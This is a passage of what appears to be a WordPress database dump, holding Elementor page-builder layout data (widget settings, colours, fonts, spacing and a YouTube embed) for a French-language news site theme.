cal\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"0\",\"category\":[\"1\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#266cc9\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"2\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"78.5\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"510\",\"category_bg_color\":\"#c9975f\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ea7441\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#e5e100\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c10cdqk\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"cnfm4uk\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ofz40wf\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":17}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1sdsi6e\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"dhtcvad\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"tdxggq6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Populaires\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"qyofxgg\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=9uOETcuFjbE\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"c999aha\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"z1s2m91\",\"elType\":\"widget\",\"settings\":{\"title\":\"Populaires\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"d8tqobd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"szy1sdj\",\"elType\":\"widget\",\"settings\":{\"title\":\"Populaires\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(1362,478,'_elementor_version','0.4'),(1363,478,'_elementor_css','a:3:{s:4:\"time\";i:1508913997;s:5:\"fonts\";a:1:{i:0;s:5:\"Arial\";}s:6:\"status\";s:4:\"file\";}'),(1365,360,'_oembed_a527ff439407ed49af172b09f4d77f15','<iframe width=\"1200\" height=\"675\" src=\"https://www.youtube.com/embed/9uOETcuFjbE?feature=oembed\" frameborder=\"0\" gesture=\"media\" allowfullscreen></iframe>'),(1366,360,'_oembed_time_a527ff439407ed49af172b09f4d77f15','1508914169'),(1367,479,'_elementor_edit_mode','builder'),(1368,479,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":1170},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"0\",\"category\":[\"1\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#266cc9\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"2\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"78.5\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"510\",\"category_bg_color\":\"#c9975f\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\